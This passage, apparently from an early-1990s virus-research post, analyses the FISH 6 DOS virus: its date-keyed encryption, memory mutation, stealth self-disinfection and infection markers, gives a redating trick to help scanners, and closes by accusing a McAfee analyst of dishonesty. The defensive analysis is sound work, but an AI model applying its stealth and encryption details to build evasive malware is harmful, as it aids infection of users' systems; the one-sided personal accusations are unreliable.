perhaps you were misled by a trick it plays as it loads into +RAM. Anyway, Dave Chess of IBM stated that he has disassembled +about half of it. Rick Engle of Wang Labs seems to have decrypted it +almost completely. The difficulty in disassembling stems from its +intentionally-misleading code. + +Regarding the reboot, perhaps the protection program you were using +caused it, not the virus itself (Incidentally, both version 1.07 and +v1.10 of the F-DLOCK program you mentioned are quite useless +against the FISH 6: it goes right by them). + +Every day, I am finding new and intriguing aspects of the FISH 6. +You have no doubt noticed that the virus changes its appearance on +disk each day of the year. All copies are encrypted, but copies +produced the same day are all encrypted similarly. This indicates +that the date holds the encryption key and indeed, that turns out to +be so: the virus looks at the date and adds the number of the month ++ the day of the month to derive `n', the number it uses as key for +its disk XORing routine. The encryption routine used on disk and the +one used in memory are not the same, however. + +I now have a fully-decrypted copy of the FISH 6. The string you +mentioned is shown: + + +(Quotation marks are mine). The entire string is displayed onscreen +if any infected file is executed twice when the system date is 1991. +any sense out of them yet (with my luck, it's probably my birthdate +- or yours!). + +Once fully decrypted, the virus code is seen to contain the +following strings, scattered all over its body: + + FISH, SHAD, TROUT, FIN, MUSKY, SOLE, PIKE, MACKEREL, + TUNA, CARP, COD, BASS, SHARK. + +While in RAM, however, they appear only partially decrypted at any +one instant, but this appearance also changes constantly. Although +obviously fish names, they are probably not true text strings as +such, but portions of executable code. Did someone take the time to +compose this: + T = 54h = PUSH SP + U = 55h = PUSH BP + N = 4Eh = DEC SI + A = 41h = INC CX +and then incorporate it into self-encrypting code in some meaningful +manner..? Are they just decoration..? Encryption keys..? + +The RAM image, responsible for the viral activity once the virus is +loaded into memory, is itself also encrypted, but not in the same +manner as on disk. Its appearance seems to change from one moment +to the next. The virus does this every time Int 21 is called. Such +mutations in RAM do not involve the entire 3584 bytes, but only many +short portions of the code, each 4-5 bytes long, at any given time. +After enough such changes have taken place, the entire body of the +virus in RAM would have been completely altered (except the de- +cryption routine itself). The size of the memory image, however, +remains definitely constant and *does not change*, as you stated. +You can be assured of that. + +The string "FISH FI..." is found, as you yourself stated, Merry, at +the end of infected disk files. This, however, is not "later removed +from the file by the virus itself", as you said. The "FISH FI..." +string is permanent. However, if you try to use it as a signature +for the virus, it isn't always useful. Perhaps this action of the +virus is what gave you the impression that the string gets removed; +it doesn't, but neither can you read it if the virus is in RAM. The +string, together with the rest of the virus code, appears to vanish. + +Like the 4096, the virus disinfects files "on the fly" as these are +loaded into RAM, so they show the original size, date and CRC. The +FISH 6 seems to use an improved technique to do this, however, and +this probably allows it to "disinfect" even files that are being +opened for Read (as when being scanned for search strings). + +The method used by the FISH 6 to determine which file to "clean up" +(as it's being opened or loaded into RAM) is different from the one +it uses to determine whether a file is already infected (for +purposes of avoiding multiple reinfection). Like the 4096, the FISH +marks infected files by altering a special byte in the file date +entry. (The presence of this "autodisinfection marker" is of limited +diagnostic value; several viruses use it). In the case of the FISH +6, files bearing this mark are automatically "disinfected" on the +fly when opened. The virus does not use this modified date entry to +determine which files to infect, in the way Zero Bug, Vienna and +other viruses do. If this byte is altered, the virus stops "auto- +disinfecting" them, but the files remain infected and infectious; +FISH 6 knows this and does not reinfect them a second time. It uses +another method to determine which files it has already infected. I +believe this may be related to certain operations performed at the +very beginning of the virus code. + + NOTE: If an infected file is manually re-dated, it will no longer + be disinfected "on the fly" by the FISH 6. Thus, files whose + "autodisinfection byte" has been deleted *can be* identified, + if infected, using string scanners, even if FISH 6 is active + in RAM. This offers a means, albeit inelegant, to prepare a + suspected file for scanning without the virus being able to + hide itself. If a file is so prepared (redated), then SCANV + and F-PROT and other string searchers will again be able to + detect it - but they may still spread the infection in any + case, if FISH 6 is in RAM. + + WARNING: + ------- +This virus would seem to encrypt itself in more than one way or, at +least, change in some unusual manner. I have in my possession +copies of what seems to be the FISH 6 virus, but which do not bear +the scanning string used by SCANV 64 and F-PROT 1.10 and are +*NOT +DETECTED BY EITHER SCANNER* on disk. Yet, they are active +and give +rise to infections which appear similar to the FISH 6. In this +sense, I have also received confirmed reports about the existence of +a "Mother Fish", larger in size and having the capability of +changing the character of the FISH 6 into a different virus. I don't +yet have this "Mother Fish" but wonder if perhaps these strange FISH +copies might have been produced by it, and if the virus which we all +call the "FISH 6" is really not a virus, in the usual sense, but +rather just the end product of a more complex, much more +sophisticated and dangerous viral *system*. If this is so (and it +appears that it may be so), then analyzing the FISH 6 as a simple +entity might be a serious mistake. +---------Message ends. + +Personally, I think it's very regrettable that the people in the +McAfee company are endangering the public by witholding information +just because it does not agree with the results they previously +published in error. How long does everybody have to live under false +assumptions just to allow "Merry Hughes" to save face? When Frank +Breault made a mistake earlier, he admitted it and corrected it +immediately (12 hours later). Why is it that the person who calls +herself (falsely) "Merry Hughes" (and who has made many, many +errors describing viruses!) cannot have the decency to admit +*his/her* mistakes? Why does he/she hide behind an alias??? +Really, there is no REQUIREMENT that he/she be infallible, +just plainly honest would do... + \ No newline at end of file